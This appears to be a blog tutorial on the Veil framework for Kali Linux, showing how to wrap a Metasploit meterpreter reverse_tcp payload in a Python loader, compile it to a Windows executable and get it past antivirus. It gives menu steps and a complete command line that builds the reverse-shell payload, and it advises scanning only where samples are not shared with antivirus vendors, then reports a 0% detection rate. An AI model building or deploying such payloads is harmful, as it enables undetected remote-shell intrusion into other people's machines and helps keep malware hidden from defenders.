Veil is an awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali Linux with the goal of:
- Bypass common AV solutions used.
- Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
- Try to create each payload as random as possible.
I want to talk about Veil and give some examples about how to bypass several anti-virus.
The main changes in the latest versions are:
- x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
- Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.
If you want to install Veil in your whatever environment you prefer, you can use the commands below:
If you want to work with Kali Linux, with the commands below it will be enough.
apt-get install veil
I had a bad experience with the second option and I prefer to install Veil with the first one using “setup.sh” script.
The Veil’s developers don’t want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There is an alternative: vscan.novirusthanks.org. That site scans the suspicious files for malware detection and offers us the option: “Do not distribute the sample”.
When Veil has been installed, just run it with the command below:
By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type “use”.
Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing “18”
When our payload is loaded, type “generate“. You can set some specifics options, but in this post, we are going to try the default options.
Now we are going to select msfvenom by typing “1”
After that, we need to type some details:
- Enter metasploit payload: “windows/meterpreter/reverse_tcp“
- Enter value for ‘LHOST’, [tab] for local IP: “192.168.69.69”
- Enter value for ‘LPORT’: “443“
Then it’s necessary to wait while the shellcode is been generated.
You need to press enter and then Veil requests the name of our payload. In this case “undetectable” (or whatever you want)
We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1”
In the end, we can get our executable at “/root/Veil-master/output/compiled/”
Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check “Do not distribute the sample“. If you choose to don’t check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.
You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!
If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.
./Veil.py -l python -p b64VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69 LPORT=443